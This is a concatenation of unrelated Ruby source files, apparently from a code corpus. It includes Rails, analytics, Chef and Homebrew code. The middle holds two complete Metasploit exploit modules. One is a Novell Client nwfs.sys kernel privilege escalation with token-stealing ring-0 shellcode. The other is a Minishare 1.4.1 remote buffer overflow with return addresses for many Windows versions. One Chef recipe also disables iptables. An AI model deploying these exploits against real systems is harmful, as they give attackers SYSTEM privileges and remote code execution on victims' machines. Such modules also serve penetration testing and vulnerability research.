end
end
blk.call(self) if blk
ensure
self.update_attributes :complete => true
end
end
# We'll store options as a JSON string, so we need to
# cast it into a string when options are assigned.
#
# WARNING: if you monkey around with the contents of options
# after it's assigned changes to the options won't be saved.
def options=(opts)
@parsed_options = opts
write_attribute :options, @parsed_options.to_json
end
def options
@parsed_options ||= JSON.parse(read_attribute :options)
end
# Return the JSON-ready Job status.
def status
(@remote_job || fetch_job).merge(attributes)
end
# Fetch the current status of the job from CloudCrowd.
def fetch_job
JSON.parse(RestClient.get(url).body)
end
# The URL of the Job on CloudCrowd.
def url
"#{ProcessingJob.endpoint}/#{cloud_crowd_id}"
end
# The default JSON of a processing job is just enough to get it polling for
# updates again.
def as_json(opts={})
{ 'id' => id,
'title' => title,
'status' => 'loading'
}
end
end | 30.646154 | 107 | 0.681727 |
87d4bc0b982298d38f155d61b78f1bda1e18be1a | 309 | class NeighborhoodServices::VacancyData::Filters::OpenThreeEleven
def initialize(three_eleven_data)
@three_eleven_data = three_eleven_data.dup
end
def filtered_data
@three_eleven_data
.select { |three_eleven_violation|
three_eleven_violation['status'] == 'OPEN'
}
end
end
| 23.769231 | 65 | 0.734628 |
918ce5e531e5f1077c20066cd9930bf3f0ddd05d | 376 | require 'spec_helper'
describe Scanner::Token do
it "is the right type of token" do
@token = Scanner::Token.new(:token_symbol, "content", 0, 0)
@token.is?(:token_symbol).should be true
end
it "is not the wrong type of token" do
@token = Scanner::Token.new(:token_symbol, "content", 0, 0)
@token.is_not?(:other_token_symbol).should be true
end
end
| 22.117647 | 63 | 0.680851 |
1a57d4d2a8b218e58720af187085f4bbcb3b9d0c | 6,069 | require 'thread'
require 'time'
require 'segment_io/analytics/defaults'
require 'segment_io/analytics/logging'
require 'segment_io/analytics/utils'
require 'segment_io/analytics/worker'
module SegmentIO
class Analytics
class Client
include SegmentIO::Analytics::Utils
include SegmentIO::Analytics::Logging
# @param [Hash] opts
# @option opts [String] :write_key Your project's write_key
# @option opts [FixNum] :max_queue_size Maximum number of calls to be
# remain queued.
# @option opts [Proc] :on_error Handles error calls from the API.
def initialize(opts = {})
symbolize_keys!(opts)
@queue = Queue.new
@test = opts[:test]
@write_key = opts[:write_key]
@max_queue_size = opts[:max_queue_size] || Defaults::Queue::MAX_SIZE
@worker_mutex = Mutex.new
@worker = Worker.new(@queue, @write_key, opts)
@worker_thread = nil
check_write_key!
at_exit { @worker_thread && @worker_thread[:should_exit] = true }
end
# Synchronously waits until the worker has flushed the queue.
#
# Use only for scripts which are not long-running, and will specifically
# exit
def flush
while [email protected]? || @worker.is_requesting?
ensure_worker_running
sleep(0.1)
end
end
# @!macro common_attrs
# @option attrs [String] :anonymous_id ID for a user when you don't know
# who they are yet. (optional but you must provide either an
# `anonymous_id` or `user_id`)
# @option attrs [Hash] :context ({})
# @option attrs [Hash] :integrations What integrations this event
# goes to (optional)
# @option attrs [String] :message_id ID that uniquely
# identifies a message across the API. (optional)
# @option attrs [Time] :timestamp When the event occurred (optional)
# @option attrs [String] :user_id The ID for this user in your database
# (optional but you must provide either an `anonymous_id` or `user_id`)
# @option attrs [Hash] :options Options such as user traits (optional)
# Tracks an event
#
# @see https://segment.com/docs/sources/server/ruby/#track
#
# @param [Hash] attrs
#
# @option attrs [String] :event Event name
# @option attrs [Hash] :properties Event properties (optional)
# @macro common_attrs
def track(attrs)
symbolize_keys! attrs
enqueue(FieldParser.parse_for_track(attrs))
end
# Identifies a user
#
# @see https://segment.com/docs/sources/server/ruby/#identify
#
# @param [Hash] attrs
#
# @option attrs [Hash] :traits User traits (optional)
# @macro common_attrs
def identify(attrs)
symbolize_keys! attrs
enqueue(FieldParser.parse_for_identify(attrs))
end
# Aliases a user from one id to another
#
# @see https://segment.com/docs/sources/server/ruby/#alias
#
# @param [Hash] attrs
#
# @option attrs [String] :previous_id The ID to alias from
# @macro common_attrs
def alias(attrs)
symbolize_keys! attrs
enqueue(FieldParser.parse_for_alias(attrs))
end
# Associates a user identity with a group.
#
# @see https://segment.com/docs/sources/server/ruby/#group
#
# @param [Hash] attrs
#
# @option attrs [String] :group_id The ID of the group
# @option attrs [Hash] :traits User traits (optional)
# @macro common_attrs
def group(attrs)
symbolize_keys! attrs
enqueue(FieldParser.parse_for_group(attrs))
end
# Records a page view
#
# @see https://segment.com/docs/sources/server/ruby/#page
#
# @param [Hash] attrs
#
# @option attrs [String] :name Name of the page
# @option attrs [Hash] :properties Page properties (optional)
# @macro common_attrs
def page(attrs)
symbolize_keys! attrs
enqueue(FieldParser.parse_for_page(attrs))
end
# Records a screen view (for a mobile app)
#
# @param [Hash] attrs
#
# @option attrs [String] :name Name of the screen
# @option attrs [Hash] :properties Screen properties (optional)
# @option attrs [String] :category The screen category (optional)
# @macro common_attrs
def screen(attrs)
symbolize_keys! attrs
enqueue(FieldParser.parse_for_screen(attrs))
end
# @return [Fixnum] number of messages in the queue
def queued_messages
@queue.length
end
def test_queue
unless @test
raise 'Test queue only available when setting :test to true.'
end
@test_queue ||= TestQueue.new
end
private
# private: Enqueues the action.
#
# returns Boolean of whether the item was added to the queue.
def enqueue(action)
# add our request id for tracing purposes
action[:messageId] ||= uid
test_queue << action if @test
if @queue.length < @max_queue_size
@queue << action
ensure_worker_running
true
else
logger.warn(
'Queue is full, dropping events. The :max_queue_size ' \
'configuration parameter can be increased to prevent this from ' \
'happening.'
)
false
end
end
# private: Checks that the write_key is properly initialized
def check_write_key!
raise ArgumentError, 'Write key must be initialized' if @write_key.nil?
end
def ensure_worker_running
return if worker_running?
@worker_mutex.synchronize do
return if worker_running?
@worker_thread = Thread.new do
@worker.run
end
end
end
def worker_running?
@worker_thread && @worker_thread.alive?
end
end
end
end
| 30.044554 | 81 | 0.610479 |
e974172e83acbab6a07bbfa4fbde6a1d92bfee9c | 309 | module ActiveBookings
module Serializer
class << self
def load(string)
if string.present?
IceCube::Schedule.from_yaml(string)
end
end
def dump(object)
if object.is_a? IceCube::Schedule
object.to_yaml
end
end
end
end
end
| 17.166667 | 45 | 0.572816 |
797bed610225c116b9851034c68c7dda305dfe84 | 557 |
#package "epel-release"
execute 'centos_disable_iptables' do
cwd "/tmp"
command "service iptables stop"
end
#bash "centos_alias_php" do
# user "root"
# cwd "/tmp"
# code <<-EOT
# echo "alias php='/usr/local/bin/php'" >> /root/.bashrc
# EOT
# not_if "grep /root/.bashrc /usr/local/bin/php"
#end
#bash "centos_alias_php-config" do
# user "root"
# cwd "/tmp"
# code <<-EOT
# echo "alias php-config='/usr/local/bin/php-config'" >> /root/.bashrc
# EOT
# not_if "grep /root/.bashrc /usr/local/bin/php"
#end
| 20.62963 | 76 | 0.612208 |
ac5f8f54076a51ff0f5c987cf413f259fba746bd | 13,528 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
def initialize(info={})
super(update_info(info, {
'Name' => 'Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel
space. The corruption occurs while handling ioctl requests with code 0x1438BB,
where a 0x00000009 dword is written to an arbitrary address. An entry within the
HalDispatchTable is overwritten in order to execute arbitrary code when
NtQueryIntervalProfile is called. The module has been tested successfully on
Windows XP SP3 with Novell Client 4.91 SP4.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ruben Santamarta', # Vulnerability discovery and PoC
'juan vazquez' # MSF module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
# Tested with nwfs.sys 4.91.4.7 as installed with Novell Client 4.91 SP4
[ 'Automatic', { } ],
[ 'Windows XP SP3',
{
'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
'_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
'_TOKEN' => "\xc8", # Offset to TOKEN from the _EPROCESS struct
'_UPID' => "\x84", # Offset to UniqueProcessId FROM the _EPROCESS struct
'_APLINKS' => "\x88" # Offset to ActiveProcessLinks _EPROCESS struct
}
]
],
'References' =>
[
[ 'OSVDB', '46578' ],
[ 'BID', '30001' ],
[ 'URL', 'http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5028543.html' ]
],
'DisclosureDate'=> 'Jun 26 2008',
'DefaultTarget' => 0
}))
end
def add_railgun_functions
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
session.railgun.add_function(
'psapi',
'EnumDeviceDrivers',
'BOOL',
[
["PBLOB", "lpImageBase", "out"],
["DWORD", "cb", "in"],
["PDWORD", "lpcbNeeded", "out"]
])
session.railgun.add_function(
'psapi',
'GetDeviceDriverBaseNameA',
'DWORD',
[
["LPVOID", "ImageBase", "in"],
["PBLOB", "lpBaseName", "out"],
["DWORD", "nSize", "in"]
])
end
def open_device(dev)
invalid_handle_value = 0xFFFFFFFF
r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ", 0x3, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_READONLY", 0)
handle = r['return']
if handle == invalid_handle_value
return nil
end
return handle
end
def find_sys_base(drvname)
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
current_drvname = results['lpBaseName'][0..results['return'] - 1]
if drvname == nil
if current_drvname.downcase.include?('krnl')
return [address, current_drvname]
end
elsif drvname == results['lpBaseName'][0..results['return'] - 1]
return [address, current_drvname]
end
end
return nil
end
def ring0_shellcode(t)
restore_ptrs = "\x31\xc0" # xor eax, eax
restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation
restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
tokenstealing = "\x52" # push edx # Save edx on the stack
tokenstealing << "\x53" # push ebx # Save ebx on the stack
tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
tokenstealing << "\x8b\x40" + t['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
tokenstealing << "\x8b\xc8" # mov ecx, eax
tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
tokenstealing << "\x75\xe8" # jne 0000101e ======================
tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
tokenstealing << "\x5b" # pop ebx # Restores ebx
tokenstealing << "\x5a" # pop edx # Restores edx
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
ring0_shellcode = restore_ptrs + tokenstealing
return ring0_shellcode
end
def fill_memory(proc, address, length, content)
result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
if not proc.memory.writable?(address)
vprint_error("Failed to allocate memory")
return nil
else
vprint_good("#{address} is now writable")
end
result = proc.memory.write(address, content)
if result.nil?
vprint_error("Failed to write contents to memory")
return nil
else
vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
end
return address
end
def disclose_addresses(t)
addresses = {}
vprint_status("Getting the Kernel module name...")
kernel_info = find_sys_base(nil)
if kernel_info.nil?
vprint_error("Failed to disclose the Kernel module name")
return nil
end
vprint_good("Kernel module found: #{kernel_info[1]}")
vprint_status("Getting a Kernel handle...")
kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
kernel32_handle = kernel32_handle['return']
if kernel32_handle == 0
vprint_error("Failed to get a Kernel handle")
return nil
end
vprint_good("Kernel handle acquired")
vprint_status("Disclosing the HalDispatchTable...")
hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
hal_dispatch_table = hal_dispatch_table['return']
if hal_dispatch_table == 0
vprint_error("Failed to disclose the HalDispatchTable")
return nil
end
hal_dispatch_table -= kernel32_handle
hal_dispatch_table += kernel_info[0]
addresses["halDispatchTable"] = hal_dispatch_table
vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
vprint_status("Getting the hal.dll Base Address...")
hal_info = find_sys_base("hal.dll")
if hal_info.nil?
vprint_error("Failed to disclose hal.dll Base Address")
return nil
end
hal_base = hal_info[0]
vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")
hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
addresses["HaliQuerySystemInfo"] = hali_query_system_information
vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}")
return addresses
end
def exploit
vprint_status("Adding the railgun stuff...")
add_railgun_functions
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
my_target = nil
if target.name =~ /Automatic/
print_status("Detecting the target system...")
os = sysinfo["OS"]
print_status("#{os.inspect}")
if os =~ /windows xp/i
my_target = targets[1]
print_status("Running against #{my_target.name}")
end
else
my_target = target
end
if my_target.nil?
fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
end
print_status("Checking device...")
handle = open_device("\\\\.\\nwfs")
if handle.nil?
fail_with(Failure::NoTarget, "\\\\.\\nwfs device not found")
else
print_good("\\\\.\\nwfs found!")
end
print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...")
@addresses = disclose_addresses(my_target)
if @addresses.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Filed to disclose necessary addresses for exploitation. Aborting.")
else
print_good("Addresses successfully disclosed.")
end
print_status("Storing the kernel stager on memory...")
this_proc = session.sys.process.open
kernel_shell = ring0_shellcode(my_target)
kernel_shell_address = 0x1000
result = fill_memory(this_proc, kernel_shell_address, 0x1000, kernel_shell)
if result.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
else
print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
end
print_status("Storing the trampoline to the kernel stager on memory...")
trampoline = "\x90" * 0x20 # nops
trampoline << "\x68" # push opcode
trampoline << [0x1000].pack("V") # address to push
trampoline << "\xc3" # ret
trampoline_addr = 0x3
result = fill_memory(this_proc, trampoline_addr, 0x1000, trampoline)
if result.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Error while storing trampoline on memory")
else
print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}")
end
print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
magic_ioctl = 0x1438BB
ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, @addresses["halDispatchTable"] + 0x4, 0x10, 0, 0)
session.railgun.kernel32.CloseHandle(handle)
print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
print_status("Checking privileges after exploitation...")
if not is_system?
fail_with(Failure::Unknown, "The exploitation wasn't successful")
else
print_good("Exploitation successful!")
end
p = payload.encoded
print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
if execute_shellcode(p)
print_good("Enjoy")
else
fail_with(Failure::Unknown, "Error while executing the payload")
end
end
end
=begin
[*] Corruption
.text:0005512E sub_5512E proc near ; CODE XREF: ioctl_handler_sub_2FE4C+295p
.text:0005512E ; sub_405C4+29Bp
.text:0005512E
.text:0005512E ms_exc = CPPEH_RECORD ptr -18h
.text:0005512E arg_0 = dword ptr 8
.text:0005512E
.text:0005512E push 8
.text:00055130 push offset stru_79268
.text:00055135 call __SEH_prolog
.text:0005513A xor eax, eax
.text:0005513C mov ecx, [ebp+arg_0]
.text:0005513F mov ecx, [ecx+0Ch]
.text:00055142 mov ecx, [ecx+60h]
.text:00055145 mov ecx, [ecx+10h]
.text:00055148 mov [ebp+ms_exc.registration.TryLevel], eax
.text:0005514B mov dword ptr [ecx], 9 // Corruption
=end
| 39.440233 | 185 | 0.606446 |
e24fd5568b5bef11ea0137cb6614ad360e41ce3b | 701 | require 'rails_helper'
RSpec.feature 'Users can sign in' do
let!(:user) { FactoryGirl.create(:user) }
scenario 'with valid credentials' do
visit '/'
click_link 'Sign in'
fill_in 'Email', with: user.email
fill_in 'Password', with: 'password'
click_button 'Sign in'
expect(page).to have_content 'Signed in successfully.'
expect(page).to have_content "Signed in as #{user.email}"
end
scenario 'unless they are archived' do
user.archive
visit '/'
click_link 'Sign in'
fill_in 'Email', with: user.email
fill_in 'Password', with: 'password'
click_button 'Sign in'
expect(page).to have_content 'Your account has been archived.'
end
end
| 24.172414 | 66 | 0.677603 |
d51fe958ac7abf0ea4c1efd7b243869b50e240c7 | 1,965 | Dummy::Application.routes.draw do
ActiveAdmin.routes(self)
devise_for :admin_users, ActiveAdmin::Devise.config
Ecm::Courses::Routing.routes(self)
root :to => "ecm::courses::course_categories#index"
# The priority is based upon order of creation:
# first created -> highest priority.
# Sample of regular route:
# match 'products/:id' => 'catalog#view'
# Keep in mind you can assign values other than :controller and :action
# Sample of named route:
# match 'products/:id/purchase' => 'catalog#purchase', :as => :purchase
# This route can be invoked with purchase_url(:id => product.id)
# Sample resource route (maps HTTP verbs to controller actions automatically):
# resources :products
# Sample resource route with options:
# resources :products do
# member do
# get 'short'
# post 'toggle'
# end
#
# collection do
# get 'sold'
# end
# end
# Sample resource route with sub-resources:
# resources :products do
# resources :comments, :sales
# resource :seller
# end
# Sample resource route with more complex sub-resources
# resources :products do
# resources :comments
# resources :sales do
# get 'recent', :on => :collection
# end
# end
# Sample resource route within a namespace:
# namespace :admin do
# # Directs /admin/products/* to Admin::ProductsController
# # (app/controllers/admin/products_controller.rb)
# resources :products
# end
# You can have the root of your site routed with "root"
# just remember to delete public/index.html.
# root :to => 'welcome#index'
# See how all your routes lay out with "rake routes"
# This is a legacy wild controller route that's not recommended for RESTful applications.
# Note: This route will make all actions in every controller accessible via GET requests.
# match ':controller(/:action(/:id))(.:format)'
end
| 29.772727 | 91 | 0.664631 |
4a7b24647be4daac1bff6465b2dabeef379bd70c | 3,049 | # Copyright 2011, Dell
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
provisioners = search(:node, "roles:provisioner-server")
provisioner = provisioners[0] if provisioners
os_token="#{node[:platform]}-#{node[:platform_version]}"
Chef::Log.info("Running on #{os_token}")
file "/tmp/.repo_update" do
action :nothing
end
if provisioner and !CrowbarHelper.in_sledgehammer?(node)
web_port = provisioner["provisioner"]["web_port"]
address = Chef::Recipe::Barclamp::Inventory.get_network_by_type(provisioner, "admin").address
case node["platform"]
when "ubuntu","debian"
repositories = provisioner["provisioner"]["repositories"][os_token]
cookbook_file "/etc/apt/apt.conf.d/99-crowbar-no-auth" do
source "apt.conf"
end
file "/etc/apt/sources.list" do
action :delete
end
repositories.each do |repo,urls|
case repo
when "base"
template "/etc/apt/sources.list.d/00-base.list" do
variables(:urls => urls)
notifies :create, "file[/tmp/.repo_update]", :immediately
end
else
template "/etc/apt/sources.list.d/10-barclamp-#{repo}.list" do
source "10-crowbar-extra.list.erb"
variables(:urls => urls)
notifies :create, "file[/tmp/.repo_update]", :immediately
end
end
end
bash "update software sources" do
code "apt-get update"
notifies :delete, "file[/tmp/.repo_update]", :immediately
only_if { ::File.exists? "/tmp/.repo_update" }
end
package "rubygems"
when "redhat","centos"
maj,min = node[:platform_version].split('.',2)
repositories = Range.new(0,min.to_i).to_a.reverse.map{|v|
provisioner["provisioner"]["repositories"]["#{node[:platform]}-#{maj}.#{v}"] rescue nil
}.compact.first
bash "update software sources" do
code "yum clean expire-cache"
action :nothing
end
repositories.each do |repo,urls|
template "/etc/yum.repos.d/crowbar-#{repo}.repo" do
source "crowbar-xtras.repo.erb"
variables(:repo => repo, :urls => urls)
notifies :create, "file[/tmp/.repo_update]", :immediately
end
end
bash "update software sources" do
code "yum clean expire-cache"
notifies :delete, "file[/tmp/.repo_update]", :immediately
only_if { ::File.exists? "/tmp/.repo_update" }
end
end
if node["platform"] != "suse" and node["platform"] != "windows"
template "/etc/gemrc" do
variables(:admin_ip => address, :web_port => web_port)
mode "0644"
end
end
end
| 34.258427 | 95 | 0.663824 |
d5ea62fe86b8402e2487fb512ff7222b357c1aa8 | 337 | # Force shared connections between threads - really, really import to keeping
# the database clean
class ActiveRecord::Base
mattr_accessor :shared_connection
@@shared_connection = nil
def self.connection
@@shared_connection || retrieve_connection
end
end
ActiveRecord::Base.shared_connection = ActiveRecord::Base.connection
| 28.083333 | 77 | 0.79822 |
ffdcf97b1dc6ba8b1afb6eeda6cc6ea97663603b | 3,006 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Minishare 1.4.1 Buffer Overflow',
'Description' => %q{
This is a simple buffer overflow for the minishare web
server. This flaw affects all versions prior to 1.4.2. This
is a plain stack buffer overflow that requires a "jmp esp" to reach
the payload, making this difficult to target many platforms
at once. This module has been successfully tested against
1.4.1. Version 1.3.4 and below do not seem to be vulnerable.
},
'Author' => [ 'acaro <acaro[at]jervus.it>' ],
'License' => BSD_LICENSE,
'References' =>
[
[ 'CVE', '2004-2271'],
[ 'OSVDB', '11530'],
[ 'BID', '11620'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
'MinNops' => 64,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp
['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp
['Windows XP SP0-SP1 English', { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret
['Windows XP SP2 English', { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret
['Windows 2003 SP0 English', { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret
['Windows 2003 SP1 English', { 'Rets' => [ 1787, 0x77403680 ]}], # jmp esp
['Windows 2003 SP2 English', { 'Rets' => [ 1787, 0x77402680 ]}], # jmp esp
['Windows NT 4.0 SP6', { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp
['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
['Windows XP SP3 French', { 'Rets' => [ 1787, 0x7e3a9353 ]}], # jmp esp
],
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'DisclosureDate' => 'Nov 7 2004'))
end
def exploit
uri = rand_text_alphanumeric(target['Rets'][0])
uri << [target['Rets'][1]].pack('V')
uri << payload.encoded
print_status("Trying target address 0x%.8x..." % target['Rets'][1])
send_request_raw({
'uri' => uri
}, 5)
handler
end
end
| 38.538462 | 94 | 0.52994 |
28054e3a1d9cd8287f1ea5b1af5220d549188ed6 | 880 | # coding: utf-8
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'java-properties/version'
Gem::Specification.new do |spec|
spec.name = "java-properties"
spec.version = JavaProperties::VERSION.dup
spec.authors = ["Jonas Thiel"]
spec.email = ["[email protected]"]
spec.summary = %q{Loader and writer for *.properties files}
spec.description = %q{Tool for loading and writing Java properties files}
spec.homepage = "https://github.com/jnbt/java-properties"
spec.license = "MIT"
spec.files = %w(LICENSE README.md Rakefile java-properties.gemspec)
spec.files += Dir.glob("lib/**/*.rb")
spec.test_files = Dir.glob("spec/**/*.rb")
spec.test_files = Dir.glob("spec/fixtures/**/*.properties")
spec.required_rubygems_version = '>= 1.3.5'
end | 38.26087 | 77 | 0.667045 |
21bc5de738c2a126c2a2ad242184b9309788d12f | 1,750 | require 'spec_helper'
class RailtieSpec < Less::Rails::Spec
describe 'config' do
it 'must have a less ordered hash' do
dummy_config.less.must_be_instance_of ActiveSupport::OrderedOptions
end
it 'must have an array for paths' do
dummy_config.less.paths.must_be_kind_of Array
end
it 'must have an options hash passed down to the #to_css method' do
basic_compressed_match = /#test-variable\{color:#4d926f\}/
dummy_config.less.compress = true
dummy_asset('basics').must_match basic_compressed_match
reset_caches
dummy_config.less.compress = false
dummy_asset('basics').wont_match basic_compressed_match
reset_caches
dummy_config.less.line_numbers = 'mediaquery'
dummy_asset('basics').wont_match basic_compressed_match
basic_sourcemap_match = /@media -sass-debug-info{filename{font-family:file/
dummy_asset('basics').must_match basic_sourcemap_match
end
end
describe 'initialization' do
it 'must register our template engine' do
dummy_assets.engines['.less'].must_be_instance_of Grease::Adapter
end
it 'must extend the context class with our config' do
dummy_assets.context_class.must_respond_to :less_config
dummy_assets.context_class.less_config.must_equal dummy_config.less
end
it 'must register our import pre processor' do
dummy_assets.preprocessors['text/css'].any? do |preprocessor|
preprocessor.is_a? Grease::Adapter
end.must_equal true
end
it 'must include the asset pipelines stylesheet paths to less paths' do
dummy_app.config.less.paths.must_include "#{dummy_app.root}/app/assets/stylesheets"
end
end
end
| 31.25 | 89 | 0.713714 |
61d008be658bf0d9112633040388c179ace9a769 | 1,615 | #
# Be sure to run `pod lib lint MyLibrary.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'MyLibrary'
s.version = '0.1.2'
s.summary = 'This is a part of app collection helping in color'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/arthi-p/MyLibrary.git'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { '[email protected]' => '[email protected]' }
s.source = { :git => 'https://github.com/arthi-p/MyLibrary.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'MyLibrary/Classes/**/*'
# s.resource_bundles = {
# 'MyLibrary' => ['MyLibrary/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 37.55814 | 101 | 0.636533 |
4a575526a9a6aba2e25d25d887af3ee0e4505959 | 97 | class ProjectResourceEmail < ActiveRecord::Base
belongs_to :project
belongs_to :resource
end
| 19.4 | 47 | 0.814433 |
1a9da5bee153df3423bc8bd8eaa4263fba60e93c | 1,046 | class Libzip < Formula
desc "C library for reading, creating, and modifying zip archives"
homepage "http://www.nih.at/libzip/"
url "http://www.nih.at/libzip/libzip-0.11.2.tar.gz"
sha256 "83db1fb43a961ff7d1d1b50e1c6bea09c67e6af867686d1fc92ecb7dc6cf98d5"
bottle do
cellar :any
revision 2
sha1 "714257f1e187a42f11c50c8f777d79d8beba28c6" => :yosemite
sha1 "65b31e70e363879aad9f8d1845e17bf7f2dcaeb3" => :mavericks
sha1 "f1571198224aa96ea539e282c24097ee4d9096d6" => :mountain_lion
end
option :universal
def install
ENV.universal_binary if build.universal?
system "./configure", "--prefix=#{prefix}",
"--mandir=#{man}",
"CXX=#{ENV.cxx}",
"CXXFLAGS=#{ENV.cflags}"
